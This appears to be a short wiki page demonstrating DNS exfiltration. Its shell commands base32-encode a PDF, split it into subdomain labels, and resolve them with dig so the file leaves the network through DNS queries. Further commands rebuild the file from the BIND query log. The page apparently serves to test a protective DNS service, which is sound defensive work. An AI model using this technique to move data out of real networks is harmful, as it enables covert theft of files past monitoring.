dns:dns_exfiltration
This is an old revision of the document!
DNS Exfiltration Demo
Simple Exfiltration
Note that the BIND logs will be approximately 17 times the size of the transferred file.
SOURCE=/home/name/dns_exfil_test/releasenotes.pdf
ENCRYPTED=/home/name/dns_exfil_test/encryptedpdf.txt
ENCRYPTED2=/home/name/dns_exfil_test/encryptedpdf2.txt
DOMAIN=domain.com
SUBDOM=asdf
LOCALDNS=protectivedns.example.com
BIND_LOG_FILE=/var/log/named/query.log
DECRYPTEDOUTPUT=/home/name/dns_exfil_test/releasenotes2.pdf
# Encrypt source file into Base32 and then split into strings of 32 characters each. Then suffix on the domain to query.
base32 $SOURCE | tr -d '\n' | fold -32 | sed -e "s/$/.$SUBDOM.$DOMAIN/" > $ENCRYPTED
# Use DIG to iterate over the file and resolve the DNS.
dig +short A @$LOCALDNS -f $ENCRYPTED
OR
for i in $(cat $ENCRYPTED); do dig +short A @$LOCALDNS $i;sleep 1;done
# Parse DNS Server logs, extract queries to exfiltration domain
cat $BIND_LOG_FILE | grep $SUBDOM.$DOMAIN | awk -F " " '{print $8}' | sed s/\(//g | sed s/\)://g > $ENCRYPTED2
# Convert back from Base32 and recreate original file.
cat $ENCRYPTED2 | tr -d '\n' | base32 --decode > $DECRYPTEDOUTPUT
dns/dns_exfiltration.1685302799.txt.gz · Last modified: by bstafford